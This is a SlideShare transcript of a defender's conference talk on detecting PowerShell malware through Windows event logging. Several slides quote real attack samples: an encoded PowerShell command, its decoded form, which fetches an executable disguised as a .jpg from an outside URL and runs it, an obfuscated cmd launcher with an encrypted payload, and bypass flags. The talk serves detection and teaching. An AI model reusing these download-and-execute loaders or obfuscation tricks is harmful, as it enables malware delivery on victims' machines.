SlideShare a Scribd company logo

BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1

Michael Gough, profile picture
Michael Gough

This PowerShell command uses many odd characters and variable names to obfuscate its intent, which is typically seen with malware. It likely downloads additional payloads or malware to the system. Logging and monitoring PowerShell activity can help detect this type of obfuscated command.

Technology
1 of 67
Downloaded 72 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
PowerShell post-exploitation, PowerSploit, Bloodhound, PowerShellMafia, Obfuscation, and PowerShell Empire, the Empire has fallen, you CAN detect PowerShell exploitation Michael Gough MalwareArchaeology.com MalwareArchaeology.com
Who am I • Blue Team Defender Ninja, Malware Archaeologist, Logoholic • I love “properly” configured logs – they tell us Who, What, Where, When and hopefully How Creator of “Windows Logging Cheat Sheet”, “Windows File Auditing Cheat Sheet” “Windows Registry Auditing Cheat Sheet”, “Windows Splunk Logging Cheat Sheet” “Windows PowerShell Logging Cheat Sheet”, “Malware Management Framework” And just released “Windows Advanced Auditing Cheat Sheet” • Co-Creator of “Log-MD” – Log Malicious Discovery Tool – With @Boettcherpwned – Brakeing Down Security PodCast • Co-host of “Brakeing Down Incident Response” podcast • @HackerHurricane also my Blog MalwareArchaeology.com
The Challenge MalwareArchaeology.com
PowerShell Exploitation • Malware loves to use PowerShell to download and launch payloads – They try and hide it too • Red Teamers love PowerShell – They love to hide too – It is already built into the OS • But they DO make noise and CAN be detected – If you know how MalwareArchaeology.com
So where do we start? MalwareArchaeology.com
Check Your Settings MalwareArchaeology.com
What is set? What version? • What version PowerShell you running? • Is PowerShell logging enabled? • Are you using a PS v2 profile.ps1 to set logging? • What is your Execution Policy? • How can you check? MalwareArchaeology.com
Audit with LOG-MD MalwareArchaeology.com
Audit with LOG-MD • We give you a report MalwareArchaeology.com
Enable Logging MalwareArchaeology.com
PowerShell has Logs! • You MUST enable them, not configured by default ;-( • “Windows Logging Cheat Sheet” (CMD LINE) • “Windows PowerShell Logging Cheat Sheet” – Follow the guidance – MalwareArchaeology.comcheat-sheets • Module Logging • ScriptBlock Logging • Transcripts if you want • Profile.ps1 for PS v2 – nop (no Profile) will bypass this ;-( MalwareArchaeology.com
PLEASE UPGRADE • For the love of NOT getting pwned… • Upgrade to PowerShell v5 • FYI – PS v6 is out and renamed the binary to pwsh.exe • So update all the queries to look for BOTH PowerShell and Pwsh • PS 5 & 6 has logging that can’t be bypassed as easily like v2, 3 and 4 with the –nop (NoProfile) MalwareArchaeology.com
Typical Malware MalwareArchaeology.com
What is Malware Using? • LOTS of PowerShell – In most, if not all malware we see – Hearing it a lot in targeted attacks – Living off the land, all the files are already there – Just add script/commands and run • PenTesters, The RED TEAM also loves them • There are LOTS of PS post-exploit kits • You will hear the term “Non-Malware” attacks MalwareArchaeology.com
Exploit Kits • PowerSploit • PowerShellEmpire • EmpireProject • BloodHound • PSRecon • PowerShell-Suite • PowerTools • Powershell-C2 • PSAttack • And more… MalwareArchaeology.com
4688 – PowerShell Bypass In the Security Log MalwareArchaeology.com
They do this to hide what you see • 4688 will capture this behavior • Stops profile.ps1 from loading in case there is any logging set inside it, hide the window, and ignore any execution policies • YAY Microsoft.. Allows built-in bypasses • LOTS of way to spell the bypasses MalwareArchaeology.com
PowerShell Bypasses • -W Hidden (Hide the window YOU see) • -NoP –sta –NonI –w hidden (no Profile, Hidden, Non-Interactive) MalwareArchaeology.com
Security Log - 4688 PowerShell Web Calls MalwareArchaeology.com
Fetch !!! • The malicious payload must phone home to get the dropper • System.Net.WebClient • DownloadString and/or http • -Enc or Encoded • There are lots of ways to spell PS commands ;-( MalwareArchaeology.com
Base64 Encoded • New way to hide from the “Process Command Line” 4688 event – No bypass words to check for… Silly hackers… It is still easy to spot • POWeRshEll -enCodedCOMmaNd – ZgB1AG4AYwB0AGkAbwBuACAAaQBlAFcATABkAFcAQQB3AHQASABpAEYAZABmAEMAUwBPAHMATQBiAHM AdwBzAGUAZgAgACgAIAAkAFgARABKAFEAaABXAGYAcQBWAHUAWABvAFIASQAgACwAIAAkAHMAYgBUAGYA TwBUAHQAbQBKAHMAaQBFAFkAVgBZAHgAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AH MAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpA GwAZQAoACAAJABYAEQASgBRAGgAVwBmAHEAVgB1AFgAbwBSAEkAIAAsACAAJABzAGIAVABmAE8AVAB0AG 0ASgBzAGkARQBZAFYAWQB4ACAAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZ QBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIA AkAHMAYgBUAGYATwBUAHQAbQBKAHMAaQBFAFkAVgBZAHgAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgB rAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgAA0ACgAkAEgAWQBs AFoAYgBVAFcAZwBGAHYAUABZAGkAZwA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAn AFwASwBkAG0ATwBiAFEAWgBWAEIAeQBRAHAAdgBCAFMAUQBpAHoAcAAuAGUAeABlACcAOwANAAoAaQB lAFcATABkAFcAQQB3AHQASABpAEYAZABmAEMAUwBPAHMATQBiAHMAdwBzAGUAZgAgACcAaAB0AHQAcA BzADoALwAvAGMAbwBtAGYAeQAuAG0AbwBlAC8AeQBiAG4AdwBpAGYALgBqAHAAZwAnACAAJABIAFkAbAB aAGIAVQBXAGcARgB2AFAAWQBpAGcAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA= MalwareArchaeology.com
Manual Translation • On a website MalwareArchaeology.com
PowerShell Log - 4104 Module Logging MalwareArchaeology.com
Translated… Fetch • function ieWLdWAwtHiFdfCSOsMbswsef ( $XDJQhWfqVuXoRI , $sbTfOTtmJsiEYVYx ){(New-Object System.Net.WebClient).DownloadFile( $XDJQhWfqVuXoRI , $sbTfOTtmJsiEYVYx );(New-Object -com Shell.Application).ShellExecute( $sbTfOTtmJsiEYVYx ); } • try{ • kill -processname EXCEL; • $HYlZbUWgFvPYig=$env:USERPROFILE+'KdmObQZVByQpvBSQizp.exe'; • ieWLdWAwtHiFdfCSOsMbswsef 'https://comfy.moe/ybnwif.jpg' $HYlZbUWgFvPYig; • }catch{} • Catch it as a PS 4104, not a Process Create 4688 MalwareArchaeology.com
PowerShell Decodes for you !!! • 4104 event will decode any –Encoded, Base64 blobs • Module Load MalwareArchaeology.com
Security Log – 4688 PowerShell Log – 4104 Windows PowerShell Log - 400 Obfuscation MalwareArchaeology.com
Fetch !!! • They will try to hide or obfuscate their behavior to make it hard to read • To me, this makes no difference, except I can’t easily understand what they are doing • They will add plus“+” to add/connect variables • They will use ticks ‘ or ^ carats to break word checks • They will use dollar $ or percent % to designate variables • So look for the Odd Characters that indicate obfuscation! – You can thank Daniel Bohannon for this shtuff MalwareArchaeology.com
Obfuscation – Odd stuff - 4688 • Becomes obvious very quickly.. This is BAD MalwareArchaeology.com Ticks Plus +
Obfuscation – Odd stuff - 4104 • Now you can’t look for words, so adapt MalwareArchaeology.com Lots of special characters, some normal for PS
Even older PowerShell v2 Event ID 400 • Look for odd characters • Count of characters are very telling once isolated or extracted from the blob MalwareArchaeology.com
4688 - Process Create Security Log MalwareArchaeology.com
Typical Malware launching PowerShell 1. User launches MS Word 1. Calls CMD.exe 1. Calls PowerShell and downloads dropper 1. Calls Malware 1. Calls 2nd copy of Malware MalwareArchaeology.com
This PowerShell looks odd • cmd jwaMLXnC iTahsHIpaITIFJCDLrOwoC XwSDfYdvV & %C^om^S^pEc% %C^om^S^pEc% /V /c set %LkOzPNSShSlqiXU%=HkMCjGoAjaAcJ&&set %var1%=p&&set %var2%=ow&&set %AhUBjnMNLHEFDPI%=pRLBAwJEiiE&&set %var7%=!%var1%!&&set %vNQpMqIhkQoukIa%=cHwdrjXtIoaIBY&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %QSAiRAvRrPuhXMB%=ataDjzmFNO&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "(nEW-ObJECT ManAGEMEnT.AuToMATIoN.PsCReDEntIAl ' '. ( '76492d1116743f0423413b16050a5345MgB8AGYAZgB2AFEAYgBtAEwAUQB5AEUAbgAwADkAUQA3AFkAUQBuAEcAVwBxAHcAPQA9AHwANAA1ADMAMQBiADkAMQAzADUAYwBiAD EAZAA2ADMAMgA5AGIANABhADQAZQA1ADUAZgA1ADMAZQA4ADYAZQBiADgAYQAyAGUAZgA3ADYANABkAGUANQBjADMAMQA3AGQAZgA5ADcAZABjAGUANwA4AGMAZAA4AD kAOAA0ADAAOQA4ADgANAA2AGUAYgA0ADAAMQA3ADUAYgA5AGMANwAwAGEANgA3ADIANQAyADEANgBmADQAZQA3ADcAZgA4ADMAMABkAGMAOABhAGQAOQA2AGIAZQAx AGMAZQBhADYAMwAxAGUAMQAzAGEANQA0ADgAYwBmADMAMQA1ADgANAAyADEAOABiAGQAOABjADAAOAAzAGUAOQA3ADIAYwA4AGIAZgBhADAAMQA1ADkAYQBjAGMAN ABlAGUAMABlAGUAMQBjADcAZQBhADMAZQBlAGEAMQBlADkANABkADYAOAAzAGEAYQA3ADcAMQBiADQAYwA5AGUANgBkAGMAYQBmADkANAA5ADYAMgBiADYAYwBkADMA OQA3ADEAZgA1AGYAYwBjADAAZQBiAGQAOAAzADQAOAA4AGMAZQA3AGMAZABjAGIAYQBiAGYAZAA4ADgAOQBiADgAOAAyADcANwAwADcANAA0ADIAZAAyADMAZQAwADMAO QBlADUANQA1ADUAMQBiADUAZgAxADgAOAA1ADcANgA5ADMANABkADkANAAzADUANwAzADgAOQA3ADAAMABiAGUAMwBiAGYAMwA1ADEAMQBiAGEANgBiADYAYgAwADUA NQAxAGUANAA3ADUAMgBjAGUANAA4ADgAYQBiADYAMQA3ADUAOQBkADEAZQA1ADUANAA3ADUANwA2ADYAOABlADgANwBmAGMAMQAzADQANwBmAGEANgA4AGUAMwA0 ADAANwBmADAANQBiADkANwAyAGEANAA3ADIAZAA3AGIAMgAxADYAYwBmADAAMwA0ADYAYwA2ADYAYgAxADkAMQA3AGUAYgA0ADkAOABiADUANgAyADgAMQBmADQAYgA 2ADYAMQAyAGMAOQAxAGEAOQA5AGEANQBiADcAYgBhAGQAYgA1ADgAZQBiAGMAZgA4AGEAMQA2ADAANgAzADkAMwBjAGIAMgA4ADcANwA3ADIANAAxADcANgAwADEAZQA2 AGQAMwBiAGYAMgBhADEAMQAxADMAYQAyAGUAOQBmADIAYgA4AGUAZQA0ADUAMwBmAGYAYwAzAGIAMABiAGMAYwAyADYANQBmADcAMgAzAGUAYgBmAGQAYgA1ADQA OAAwADEANAA3ADcAZgAyAGQAZAA4AGUAYgBhAGYAOQA1ADMAMgA5AGEANgA2ADQANwAwAGUANwAzADMAZQBlADgAMgBjAGEAYwAzAGQAOQBhADQAYQA4ADAAMgAwA GQAOABkAGMANwAxADAANQA5ADEAYwBkAGIAYgA4ADMANgAwADYAZQBkAGYAMAA4ADgAMwBmADUANABhAGYAOABmADgANQAyADAAMQA4ADYAYwAxADMAMQBiADkAZ gA4AGIAZQAzADQAZgA5AGYAMQBkADcAOQA4AGIAZgAxADcAOAAxADMAOAA5ADEANQAxAGQAYQBjADIAYwAxADcAMAAwADEANwAzADgAMQA4ADgAMgA0ADMAMwBmADMA ZQBkADUAMAA4ADYAYQBiADIAYgAxAGEAYgA3ADMAMAAxADAAMABhADIAYwA1AGYAZgA0ADkAYgBiADkANwBjAGMANwBkADgAMQAzADUAMAAxADAAZQBmAGEAMQAyADQA OQBhAGMAMQBkAGYAZgBjAGEAZgBiADYAMAA2ADUAOABhAGYANwAzADEAOQAzADEAZQBhADUANwA4AGMAYQBmADEANwAxADEAOAA1ADgANgA0ADkANABjADYAMABkAGU AYgA2AGUAMQBlAGIAMgA5ADkAYQAwADAANgA1ADAANgAxADYANgBkADUAYwA2AGIAYgAyAGYAMAA0ADYAYgBlADAANwA1AGQAOQAxADcAOABmAGMAOAA2ADEAMQA4ADc AMAA3ADcAYwA0AGUAYgA2AGIAOQAyADMAYgBhADgAMQBlADAAOQA3ADgANgBkAGIAYwA4ADEAMgA2ADQAZgA5AGMAOQAwAGYAZAAwADQAYQBkAGUAOAA1ADkAZQBlAD UANwA2ADgANAA4ADkANQBiADgAMgAzADMAMgAwAGUAYgA1ADMANQBiAGUANAA5AGMAYgA4ADAAYQA4AGQANABiAGEAMwA1ADQAMwBhADAAMQA3AGYAYwAwADMAY wA3ADEAYwAyADQAZQBlAGMAOQBmADkAMgA0AGMAYQAyAGMANgA2AGQAOABlADQAOAA5ADUAMwBjADQAZABkADIAZQA2ADQAYQAzADgANAAxADcAOABmAGMAMABhAG QANgAyADIANwA4ADQAYQA2AGYANABiADgAMQA4ADcAYgAwADgAZABmADgAMQA0AGMAYwBhADcAYgBlAGEAOQAyADcAMgBiADcAOAAxADkAMQBiADcAZAAwADUANgA0AG QAMwAzAGYAMQBjADgAOQBiAGUAZQA3ADgAZAAxAGIANwA1AGMAMQA2ADIAOQAyADMAMAA3ADcAZgA4ADEAZAAyADQAZABkAGUANwBlAGYANAA1ADAANABkADUAMgAxA DEANgAxADgAZQBjAGUAMwBlADUAMQAyADgANABlADEANwA4ADYAZABlADIAMgA5ADAAYgAwADYANAA2ADAAZQA2ADIAMQBlADQAYwA5ADAAZAA0ADgAOAA4ADgANgA5ADc ANAA2ADMAYwBjADIAOABlADYAYwBiADYAMwA2AGUAMAAxADEAZgA2AGMAYgAzAGUANwBjADIAMABmADcANgAwADgAMgA4AGYAZAA5ADgAOQBjADMAZgBiAGUAYgA4ADkA MQA4AGIANwA2ADYAYgBhAGMAMQA4ADUAMAAwADMAMQAyADEAYQA2ADUAMQBhADQANABlADAAMQA5AGYAZQAxADcAZgBjADIANQBjADgANgA3ADUAOQA0ADIANwA4AD cAYgA1ADUAYgA0ADAANAA0ADkAMgBhAGMAZQBmAGEAZAAwAGEAZQBjAGIAMQBkAGEAMwAzADEAMABlADMAOQAyADAAZABkADMAMQA1ADQAMgA4ADEAMABlADQAZgAx AGIAZAAyADkAZgA2ADIAMwBkADAAMgBjAGQAYgBlADYAMgBkADEAYwBjADMAMwBhADUANgA2AGIAMQA1ADMAYwA3ADMANQA4AGEAYwAyADkAOAA3AGUANQBmAGYAOAA 3ADMAZQA1AGMAOQBkAGQAYwBiADcAMQA1ADAANwAwAGUAYwAwAGIANAA3ADQANwAwADMAMAA2ADEAOQAxADcAOAA0AGUANQA4ADgANgBlADAANQA3AGQANwAxAGI ANAAyAGQANgA2ADUAOQA0ADkAMAA1ADkANQBkADQAZgBhAGUANAAzADUANQA4ADQAMwBkAGIAMwBhAGQAZgA5ADEAYgA3ADcAMABhADMAYQA2AGUAYQAwADkANwAx AGMAYQA3AGIANAAwADkANgA2AGYAMQA1ADcANQA1AGMAYQA3AGYAMQA2AGIANgAyADAAMAA4ADEAYgAwADcAZQBhADUAYQBjAGQAOQBhADUAZgAzAGMANQBiADIANQA yADQAOAA2ADgANwA0ADgANgAyADIAYwAxADQAYgBlADgAZAA3ADUANAA5AGQAZQA5ADkAMAAwADkANwBjADcAMABkAGQAMgBiADcAMABiADEAYwBjADAANgBkADIAYgA4A DYAMQAyADUAMgA2ADgAMAA0AGEAYQBlAGMANAAxADUAZQAxADEAOAAzADgAZgA0ADIAMgA3ADEAYQBiAGYAOABhADAAMgBiADkANwA0ADMAOQAwAGQAMgA2ADMAYwB kADYAYQA4ADAANgA1ADgAMgBlAGEANwA3AGQAMQAwADQAYQBhAGQAOABlADgANQBlAGMAZQA1ADAAZABkAGIANQAwAGEAYgBmAGMAOAAzADAAMwBlADUAMgBiADYAY wBiAGMAMwBjADAAZAAzADEAZQBiAGMAYwAxAGMAMgBjADAAMwAzADEAMgAzAGYAYwBkAGMANgA1AGMANwA0AGUANQA4ADYAMQA5AGYAZAA0ADgAMQA3AGUANQA4A DUANwBlADgAZQAxAGUAOQA1AGMAZgBjAGQAMwBkADMAZgBmADgAMwBjADEAMAA4ADgANAA5ADMAYwBmADAAMAAzADUAYwBkADEAZAAxADkAMAAxADYANgA4ADgAMQ A5AGIAOQBiADkAMwAzADUAMgA4ADAAOAAxAGQAZQBkAGEAYwA0ADIAMwBiADUANAAwADQAMgAzADMANwBlAGEAZQA4ADgAMgAwADEAYQAyAGQAMAA2AGYAZQA3ADYA YQAwADEANQBjAGUAZQA5ADAAMABkAGMAMAA2AGIAZQBhADAANwBiADQAMQBjADAAZQAyAGUAOQAyADAAZgAyAGUAYgBmADQANAA0ADIAZAA2AGYAOAAwAGUAYQA3AD kANwA1ADcAOABjADUANgA0ADAANgAwAGYAYgA0ADUANwBjAGYAOAAxADUAOAA1AGUAZAA5ADEANABjADAAMAAyADcAOAA5ADIAZQBiAGQAMABlADUAMAA2ADkAZAAyADc AMwAxAGEAOAA4ADcAZQA1AGIAMAAzADcAYgBiAGQAMABjAGYAOAA0ADQAYQAyADEANwA0ADAAYgA2AGMAMgA4ADMAOQAxAGIAOQBmADMANgBlADQAMABjADAAMQA1A DYAYgA4ADQAMwA5AGMANwBhADYANABhAGUAYgA3ADUAZgBmAGYAMgBhADAAYQBiAGQAZQA3ADUAZgBiADMAMQA4ADcAMQA5AGYAZAAyADkAZAAxAGMANQA3AGEAYgA wADcANAA2AGUAMQA1ADEAYQBlAGMAZgAwAGMAZAA0ADQAYgAwAGQAMwA2ADAAMQBhAGEAYQA4ADkAZgBhADEAMwBjADAANQA3ADgANgAyAGQAMQAxAGIAZgA2AGMA NQBhADkAOABhADIAOAA0AGEANgBhADIAYgBkAGYAYQBhAGUANwA0AGYAOQBjADAAZABkADMAYwBiADAAZgBjAGIAMgAyADUAMgBiADEAZgA1ADcAMQAxAGEAYwAxAGMANw A3ADIANQAxADgAOAAxAGUAYQAxAGQAZQBkADAAMQA3ADEAZAAwADcANQA0ADcAMAAxADIANgAzADcAMgBiADcANwBkADgAMQAyAGQAYgBiAGEAZAA4ADEAZgAzADgAZABk ADcAZAA2ADcANQA5AGYANwBiADMA'|CONVerttO-SecuresTrInG -ke 150.105.213.121.221.126.137.121.68.30.46.202.28.13.28.138 ) ).gETNEtwORkCrEdeNTIaL().pasSwoRD|.((vAriabLE '*mdR*').NAME[3.11.2]-JOin'') MalwareArchaeology.com
This PowerShell looks odd • cmd jwaMLXnC iTahsHIpaITIFJCDLrOwoC XwSDfYdvV & %C^om^S^pEc% %C^om^S^pEc% /V /c set %LkOzPNSShSlqiXU%=HkMCjGoAjaAcJ&&set %var1%=p&&set %var2%=ow&&set %AhUBjnMNLHEFDPI%=pRLBAwJEiiE&&set %var7%=!%var1%!&&set %vNQpMqIhkQoukIa%=cHwdrjXtIoaIBY&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %QSAiRAvRrPuhXMB%=ataDjzmFNO&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "(nEW-ObJECT ManAGEMEnT.AuToMATIoN.PsCReDEntIAl ' '. ( '76492d1116743f0423413b16050a5345MgB8AGYAZgB2AFEAYgBtAEwAU QB5AEUAbgAwADkAUQA3AFkAUQBuAEcAVwBxAHcAPQA9AHwANAA1 ADMAMQBiADkAMQAzADUAYwBiAD – 42 more lines of Script Block code • ADcAZAA2ADcANQA5AGYANwBiADMA'|CONVerttO-SecuresTrInG -ke 150.105.213.121.221.126.137.121.68.30.46.202.28.13.28.138 ) ).gETNEtwORkCrEdeNTIaL().pasSwoRD|.((vAriabLE '*mdR*').NAME[3.11.2]-JOin'') MalwareArchaeology.com
Did that look normal? • 4688 will show you the Process execution – What called what • What called PowerShell, and the parents above – Word > CMD > PowerShell = Always BAD • What did PowerShell logging catch? – That big blob looked interesting MalwareArchaeology.com
4104 - PowerShell Script Block Logging Microsoft-Windows-PowerShell/Operational Log MalwareArchaeology.com
Script Blocks are labeled MalwareArchaeology.com
Then you will see this in the logs • It is not translated, just recorded • But they are LARGE – You can trigger on say > 1000 characters – You can see this one will also trigger Obfuscation MalwareArchaeology.com
This is a normal Script Block MalwareArchaeology.com
Do they look the same? MalwareArchaeology.com Readable NOT Readable Obfuscated
And they obfuscate MalwareArchaeology.com Ticks Plus +
4104 - PowerShell Module Logging Microsoft-Windows-PowerShell/Operational Log MalwareArchaeology.com
WARNING !!!! MalwareArchaeology.com • PowerShell does have a WARNING if something is odd • Trigger Alerts on these too • 4104
WARNING !!!! • The Remote Command along with all this… = BAD MalwareArchaeology.com
WARNING !!!! • And the raw log MalwareArchaeology.com
WARNING !!!! • And you can see translation in Event ID 4100 MalwareArchaeology.com
WARNING !!!! • And you can see translation in Event ID 4100 MalwareArchaeology.com
4100 – Executing Pipeline • Can see some translation occurring MalwareArchaeology.com I can read this NOT this
PS v2 - 500 Events • Windows PowerShell MalwareArchaeology.com
PS v2 200 Events • Command Health MalwareArchaeology.com
Whitelisting PowerShell In the Logs MalwareArchaeology.com
Filtering out the good, to find the bad • PLEASE put a Mark/Sign/Secret Key in your scripts MalwareArchaeology.com
Code your PowerShell for exclusion • Make the scripts excludable on obvious things YOU or your company does or knows • The path is awesome – All scripts excluded by path alone • Names, Secret Code, Key – Have your scripts contain something only you know that is a ‘secret key’ to exclude by • Or.. Sign your PS scripts MalwareArchaeology.com
Once you create these queries MalwareArchaeology.com
Create Email Alerts • Trigger on PS launching • Tweak and filter out known good – Get your developers to mark their code!! MalwareArchaeology.com
PowerShell Log Goodness • Enable the logs per the Cheat Sheets • PS v2 Logs (even if you have PS v5) – Collect Event ID 200, 400, and 500 – Windows PowerShell • PS v5 v6 Logs (maybe v4 if you hack it) – Collect 4100, 4104 – Microsoft-Windows-PowerShell/Operational • Windows Logs – Collect 4688 – WITH Process Command Line MalwareArchaeology.com
Security Log Event ID - 4688 • PS executed • PS Bypass executed • PS Suspicious buzzwords • PS Count Obfuscation Characters (‘ + $ % ;) • You can look for large Scripts Blocks and Base64, but use the PS logs for this MalwareArchaeology.com
PowerShell v2 • 200 – Command Health – WARNING, will give you some translation • 400 – Engine Lifecycle – What executed • 500 – Command Lifecycle - What executed and the command line if using profile.ps1 – and if “No Profile” (-nop) is not bypassed MalwareArchaeology.com
PowerShell v2 Event IDs - 200 and/or 400 • PS Web Call • PS Count Obfuscation Chars (‘ + $ % ;) • PS ScriptBlock size (> 1000) • PS Base64 blocks • PS WARNINGS MalwareArchaeology.com
PowerShell v5 & v6 • 4100 – Executing Pipeline - WARNING • 4104 – Execute a Remote Command – WARNING and Verbose • No Obfuscation here, stripped out as it is executed, so you get clean code • That big Base64 blob… now it is readable MalwareArchaeology.com
PowerShell v5 & v6 Event IDs - 4100 and/or 4104 • PS Web Call • PS Suspicious Commands (buzzwords) • PS Count Obfuscation Chars (‘ + $ % ;) • PS ScriptBlock by size (> 1000) • PS Base64 blocks • PS WARNINGS MalwareArchaeology.com
Sysinternals Sysmon Service • You can catch Not-PowerShell PowerShell execution • Event ID 7 – Module loads – Look for Process that is calling System.Management.* DLLs • And all the other cool stuff Sysmon collects MalwareArchaeology.com
Summary • Enable PowerShell logging ! – Use the Cheat Sheets • LOG-MD will check your system and report – Use it to evaluate malware too • Create Reports and Alerts for the items discussed • Maybe add Sysmon on a few systems for ID 7 • Use the “Windows Splunk Logging Cheat Sheet” for some examples of what was discussed • Send us your improvements and tweaks !!!! • But START LOGGING POWERSHELL !!!! MalwareArchaeology.com
Shout Out • This is one DAMN GOOD Report • I use it in my Malicious Discovery Training • Palo Alto Networks – “Pulling Back the Curtains on EncodedCommand PowerShell Attacks” • https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the- curtains-on-encodedcommand-powershell-attacks/ • GREAT analysis on the Fu the bad guys use that will help you craft your queries and alerts • Actual spelling of the pwnage, etc. MalwareArchaeology.com
Resources • https://www.invincea.com/2017/03/powershell-exploit-analyzed-line-by-line/ List of Tools • https://github.com/emilyanncr/Windows-Post-Exploitation Obfuscation • http://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation- usage-guide • http://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation- usage-guide-part-2 • https://github.com/danielbohannon/Revoke-Obfuscation • https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke- obfuscation-report.pdf • https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the- wild.html Metasploit Check Logging module • https://github.com/darkoperator/Meterpreter-Scripts/tree/master/scripts MalwareArchaeology.com
Resources LOG-MD.COM • Websites – Log-MD.com The tool • The “Windows PowerShell Logging Cheat Sheet(s)” • All the other Cheat Sheets too – MalwareArchaeology.com
Questions? LOG-MD.COM You can find us at: • Log-MD.com • @HackerHurricane • MalwareArchaeology.com • HackerHurricane.com (blog)

More Related Content

What's hot (20)

PDF
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
Michael Gough
 
PDF
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Michael Gough
 
PDF
Logs, Logs, Logs - What you need to know to catch a thief
Michael Gough
 
PDF
Windows Incident Response is hard, but doesn't have to be
Michael Gough
 
PDF
Malware Management - HouSecCon 2014
Michael Gough
 
PDF
InnoTech 2017_Defend_Against_Ransomware 3.0
Michael Gough
 
PDF
DIR ISF - Email keeps getting us pwned v1.1
Michael Gough
 
PDF
RMISC logging for hackers
Michael Gough
 
PDF
Sandbox vs manual malware analysis v1.1
Michael Gough
 
PDF
Logging for Hackers - What you need to know to catch them
Michael Gough
 
PDF
Sandbox vs manual analysis v2.1
Michael Gough
 
PDF
Detecting WMI Exploitation v1.1
Michael Gough
 
PDF
Deeplook into apt and how to detect and defend v1.0
Michael Gough
 
PDF
Info sec is not daunting v1.0
Michael Gough
 
PDF
What can you do about ransomware
Michael Gough
 
PDF
Mw arch mac_tips and tricks v1.0
Michael Gough
 
PDF
Finding attacks with these 6 events
Michael Gough
 
PDF
Proper logging can catch breaches like retail PoS
Michael Gough
 
PDF
Ask a Malware Archaeologist
Michael Gough
 
PDF
Secure Yourself, Practice what we preach - BSides Austin 2015
Michael Gough
 
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
Michael Gough
 
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Michael Gough
 
Logs, Logs, Logs - What you need to know to catch a thief
Michael Gough
 
Windows Incident Response is hard, but doesn't have to be
Michael Gough
 
Malware Management - HouSecCon 2014
Michael Gough
 
InnoTech 2017_Defend_Against_Ransomware 3.0
Michael Gough
 
DIR ISF - Email keeps getting us pwned v1.1
Michael Gough
 
RMISC logging for hackers
Michael Gough
 
Sandbox vs manual malware analysis v1.1
Michael Gough
 
Logging for Hackers - What you need to know to catch them
Michael Gough
 
Sandbox vs manual analysis v2.1
Michael Gough
 
Detecting WMI Exploitation v1.1
Michael Gough
 
Deeplook into apt and how to detect and defend v1.0
Michael Gough
 
Info sec is not daunting v1.0
Michael Gough
 
What can you do about ransomware
Michael Gough
 
Mw arch mac_tips and tricks v1.0
Michael Gough
 
Finding attacks with these 6 events
Michael Gough
 
Proper logging can catch breaches like retail PoS
Michael Gough
 
Ask a Malware Archaeologist
Michael Gough
 
Secure Yourself, Practice what we preach - BSides Austin 2015
Michael Gough
 

Similar to BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1 (20)

PDF
From P0W3R to SH3LL
Arthur Paixão
 
PPTX
Invoke-Obfuscation DerbyCon 2016
Daniel Bohannon
 
PPTX
Invoke-Obfuscation nullcon 2017
Daniel Bohannon
 
PPTX
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Daniel Bohannon
 
PPTX
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
CODE BLUE
 
PDF
Proper logging can catch breaches like retail PoS
Michael Gough
 
PPTX
PSConfEU - Building an Empire with PowerShell
Will Schroeder
 
PDF
Malware analysis _ Threat Intelligence Morocco
Touhami Kasbaoui
 
PPTX
Hacke windows med windows - avanserte angrep
Oddvar Moe
 
PPTX
Bsides tampa
Octavio Paguaga
 
PPTX
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
PPTX
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
PPTX
Building APIs with MVC 6 and OAuth
Filip Ekberg
 
PDF
Weaponizing Recon - Smashing Applications for Security Vulnerabilities & Profits
Harsh Bothra
 
PDF
DEFCON 23 - Jason Haddix - how do i shot web
Felipe Prado
 
PDF
Columbus WordCamp 2015
Jason Packer
 
PDF
Sophisticated Attacks - Can We Really Detect Them _v1.2.pdf
Michael Gough
 
PDF
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
